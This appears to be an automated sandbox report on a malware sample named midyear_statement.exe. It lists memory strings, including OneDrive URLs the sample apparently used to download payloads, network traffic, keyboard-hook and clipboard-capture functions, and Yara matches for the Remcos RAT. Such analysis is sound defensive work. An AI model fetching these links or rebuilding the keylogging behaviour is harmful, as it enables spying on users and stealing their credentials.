                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://ocsp.msocsp.com0S
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: wkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: midyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.drString found in binary or memory: http://www.pmail.com
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                      Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/
                      Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/o
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5
                      Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDij
                      Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNN
                      Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_
                      Source: midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com/
                      Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3
                      Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0Kw
                      Source: Dhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre
                      Source: midyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZH
                      Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6c
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJ
                      Source: midyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1y
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abqscw.sn.files.1drv.com/
                      Source: midyear_statement.exe, 00000000.00000003.1219564986.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPA
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJH
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6M
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/W
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/X
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/a
                      Source: midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/g
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: wkrriuhD.pifString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
                      Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.co
                      Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
                      Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
                      Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=
                      Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: wkrriuhD.pifString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: bhv348F.tmp.27.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,0000000024_2_1233A2B8
                      Installs a global keyboard hook
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wkrriuhD.pifJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,24_2_1233B70E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,24_2_123468C1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,27_2_0040987A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,27_2_004098E2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,28_2_00406DFC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,28_2_00406E9F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,24_2_1233B70E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,24_2_1233A3E0

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
